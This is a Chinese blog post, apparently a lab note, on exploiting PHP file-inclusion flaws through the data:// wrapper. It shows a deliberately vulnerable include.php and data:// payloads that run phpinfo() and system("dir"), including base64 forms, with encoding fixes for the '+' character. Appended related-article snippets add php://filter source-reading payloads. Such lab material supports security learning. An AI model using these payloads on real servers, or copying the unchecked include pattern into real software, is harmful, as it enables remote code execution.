文件包含漏洞之PHP伪协议中的data://的那些事~

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量1.2w 收藏 27
点赞数 18
分类专栏: php 文章标签: php web 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46091464/article/details/106665358
版权

最近在看文件包含漏洞中的PHP伪协议,发现其中的一个data://方法不能使用?但是自己确实把php.ini里面的allow_url_fopen和allow_url_include打开了。而且在web安全这本书里面也是一模一样的写法?
最后才发现了问题,原来是编码的问题。

实验:

//include.php
<?php
    @$file  = $_GET['file'];
    @include($file);
?>

通过data://text/plain协议来进行漏洞利用。

?file=data://text/plain,<?php phpinfo();?>

在这里插入图片描述
发现不能使用,而且自己的代码没有问题啊?不知道为什么?
然后测试

?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+

在这里插入图片描述
发现还是错误的????

然后测试下面的。成功~~~

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJkaXIiKTs/Pg==

在这里插入图片描述

总结:

通过实验发现这个可能是编码的问题因为<?php phpinfo();?>在编成base64的时候出现了+。而浏览器不认识+号。所以解决方法

  1. 不写后面的?> 因为PHP里面其实不需要写后面的 前面的;号就已经说明结束了。如果没有;号就必须写?>作为结束。
  2. 添加空格改变base64编码。
  3. 将+号换成%2b

所以其实不需要通过base64编码来实现!!!
将<?php phpinfo();?>改变成url编码。这样浏览器可以识别!
在这里插入图片描述希望可以帮助朋友们~~~

Firebasky
关注
  • 18
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
[BJDCTF2020]ZJCTF,不过如此(php伪协议,data伪协议,preg_replace /e漏洞)
weixin_44110537的博客
10-04 482
伪协议常用在文件包含漏洞. 常见的文件包含函数有: include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile. 具体的函数功能可以参考. 伪协议的学习 通过data协议构造 data://text/plain,I have a dream 通过php协议构造 php://filter/convert.base64-encode/resource=ne.
编码 data:text/html;c,javascriptData URI使用详解
热门推荐
weixin_31264951的博客
06-23 1万+
Data URI,不是URLURL是uniform resource locator的缩写,在web的每一个可访问资源都有一个URL地址,例如图片,HTML文件,js文件以及style sheet文件,我们可以通过这个地址去download这个资源。其实URL是URI的子集,URI是uniform resource identifier的缩写。URI是用于获取资源,包括其附加的信息的一种协议。附...
data://协议
yzl_007的博客
10-10 2964
data://协议 需满足allow_url_fopen,allow_url_include同时开启才能使用,使用如下: file.php?file=data://text/plain,<?php phpinfo()?> 前面一段是相同格式,后面是php命令
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议data伪协议、file伪协议)
最新发布
2401_84208172的博客
05-24 1219
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
文件包含PHP伪协议学习笔记
2302_80935968的博客
03-22 922
1.当allow_url_fopen=Off和allow_url_include=Off或allow_url_fopen=Off和allow_url_include=On时,文件包含失败。data:// 同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。2.当allow_url_fopen=On和allow_url_include=On时,include等其他包含函数才会将URL代表的文件包含执行,文件包含成功。
PHP伪协议
liwenqianye的博客
12-21 2774
文件包含伪协议 PHP内置了很多URL风格的封装协议,可用于类似fopen()、copy()、file_exists() 和 filesize()的文件系统函数。 常见文件包含函数: include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file. 常见的伪协议php:// — 访问各个输入/输出流(I/O streams) data:// —
data和filter协议文件包含
fzy2003的博客
07-05 556
掌握data协议和filter协议的用法。
文件包含漏洞相关协议详解
永远是少年
12-13 2442
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞相关协议详解。 一、文件包含常用协议 1、file协议 2、php相关协议 3、zip协议 4、data协议 5、其他协议 二、各协议利用条件
CTFshow——web入门——文件包含
h_adam的博客
10-24 3843
web入门——文件包含web78 web78 题目 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 题解
文件包含漏洞php伪协议
qq_46485934的博客
09-26 780
一.前情提要 本人在写buuctf的时候,碰到一道文件包含php伪协议的题目include 于是,我就想深入的了解一下PHP伪协议 二.文件包含函数 首先归纳下常见的文件包含函数:include,require,include_once,require_once,highlight_file,show_source,readfile,file_get_contents,fopen,file 三.伪协议 php伪协议php封装协议,这些协议常被CTF出题文件包含漏洞结合。这里做个小结,涉及的相关伪协议
php伪协议漏洞_include(文件包含漏洞php伪协议)
weixin_39935257的博客
01-17 1078
点击tips查看元素,也并没有有用的信息,联想到题目,include想起了文件包含漏洞。构造payload?file=/../../../../../../flag.php没有返回东西。看完wq学到了一个新姿势:php伪代码构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php使用 "php://filter...
浏览器data类型的Url格式 data:image/png,data:image/jpeg!
09-25
这种格式最初在1998年的RFC2397被定义,目的是为了允许开发者直接在页面内包含小量的数据,而无需从外部文件加载。这样可以减少HTTP请求,从而提高页面加载速度,并减轻服务器负担。 数据类型URL的基本结构是`...
PHP输入流php://input介绍
12-19
PHP,`php://input`是一个非常重要的输入流接口,它主要用于读取HTTP请求的原始POST数据。这个特殊的输入流允许开发者直接访问未经解析的POST数据,而不需要依赖于`$_POST`全局变量或者使用`$...
HDFS上传文件报错org.apache.hadoop.fs.ChecksumException: Checksum error: file:/hyk/data/hyk.txt
01-07
当从本地上传文件到HDFS时报错 fs.FSInputChecker: Found checksum error: b[0, 69]=6d6f77656968616861686168616868616686168616861686861680a org.apache.hadoop.fs.ChecksumException: Checksum error: file:/...
php输入流php://input使用示例(php发送图片流到服务器)
12-19
`php://input`是PHP一个特殊的输入流,用于在POST请求获取原始的数据,特别是当请求的`Content-Type`不是`multipart/form-data`时。它是一个只读流,允许开发者直接访问请求体的数据,而不需要依赖PHP的全局...
PHP输入流php://input实例讲解
01-20
对于php://input介绍,PHP官方手册文档有一段话对它进行了很...“php://input allows you to read raw POST data. It is a less memory intensive alternative to$HTTP_RAW_POST_DATA and does not need any special ...
文件包含知识学习总结
qq_64222098的博客
03-19 211
本地文件包含漏洞(LFI):只能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者可以控制的,所以一般攻击者都是包含一些固定的系统配置文件,从而去读取系统敏感信息。程序员一般会把重复使用的函数写入文件,在需要使用某个函数时直接调用这个文件,这种文件的调用过程一般称为文件包含。在该目录下的web.xml文件有某个文件的相关的映射的话,可以直接在页面访问这个文件,类似于文件包含。如果程序没有对文件的来源进行严格的审查,客户端就可以传入包含恶意代码的文件,导致文件包含漏洞。用来接收POST数据。
文件包含支持的伪协议
qq_50673174的博客
05-15 7803
文件包含漏洞的补充。 主要是文件包含漏洞支持的伪协议
phpdata(,如何使用phpdata函数
weixin_30253289的博客
03-10 1929
php可以通过设置data函数里的参数来对日期和时间进行格式化来获取时间和日期【推荐课程:PHP教程】在php可以使用date() 函数对日期和时间进行格式化。在data函数它的第一个参数是规定了如何格式化日期时间。它使用字母来表示日期和时间data函数的语法:date(format,timestamp)其format代表时间的格式,timestamp代表规定的时间,默认情况下指的是当...
data://协议详解
11-10
`data://`协议PHP的一种数据流协议,它允许将数据作为文件来读取。该协议的语法如下: ``` data:[<mediatype>][;base64],<data> ``` 其,`<mediatype>`是可选的媒体类型,`<data>`是实际的数据。如果指定了`base64`参数,则表示数据是经过Base64编码的。 以下是一个使用`data://`协议读取文本数据的例子: ```php $data = 'Hello, world!'; $uri = 'data:text/plain,' . $data; $handle = fopen($uri, 'r'); echo fread($handle, strlen($data)); // 输出:Hello, world! fclose($handle); ``` 以下是一个使用`data://`协议读取图片数据的例子: ```php $data = file_get_contents('path/to/image.jpg'); $base64 = base64_encode($data); $uri = 'data:image/jpeg;base64,' . $base64; echo '<img src="' . $uri . '">'; ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值